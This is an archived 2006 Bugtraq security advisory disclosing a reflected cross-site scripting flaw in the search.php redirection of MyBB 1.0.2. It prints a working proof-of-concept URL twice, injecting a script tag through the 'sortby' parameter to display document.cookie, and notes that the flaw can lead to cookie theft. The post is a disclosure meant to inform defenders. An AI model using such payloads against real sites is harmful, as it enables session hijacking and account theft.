Bugtraq mailing list archives
MyBB 1.0.2 XSS attack in search.php redirection
From: addmimistrator () gmail com
Date: 25 Jan 2006 23:33:02 -0000
http://127.0.0.1/mybb/search.php?action=do_search&keywords=&postthread=1&author=imei&matchusername=1&forums=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby="><script language=javascript>alert(document.cookie)</script>&sorder=1&showresults=threads&submit=Search --------------------Summary---------------- Software: MyBB Sowtware's Web Site: http://www.mybboard.com Versions: 1.0.2 updated Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: imei Risk Level:low -----------------Description--------------- Mybb has a security bug that allows hackers run unwanted scripts into client's browser that well known as XSS cross site scripting bug is in result of poor cheknig of two input varibles "sortby" & "sortordr" in redirection page of search pages. line668of search.php a full exploit can result to thefting cookies... bug founded by imei and reported to vendor... --------------Exploit---------------------- go to this url: /mybb/search.php?action=do_search&keywords=&postthread=1&author=imei&matchusername=1&forums=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby="><script language=javascript>alert(document.cookie)</script>&sorder=1&showresults=threads&submit=Search --------------Solution--------------------- No Patch available. --------------Credit----------------------- Discovered by: imei addmimistrator[at]gmail[dot]com
Current thread:
- MyBB 1.0.2 XSS attack in search.php redirection addmimistrator (Jan 26)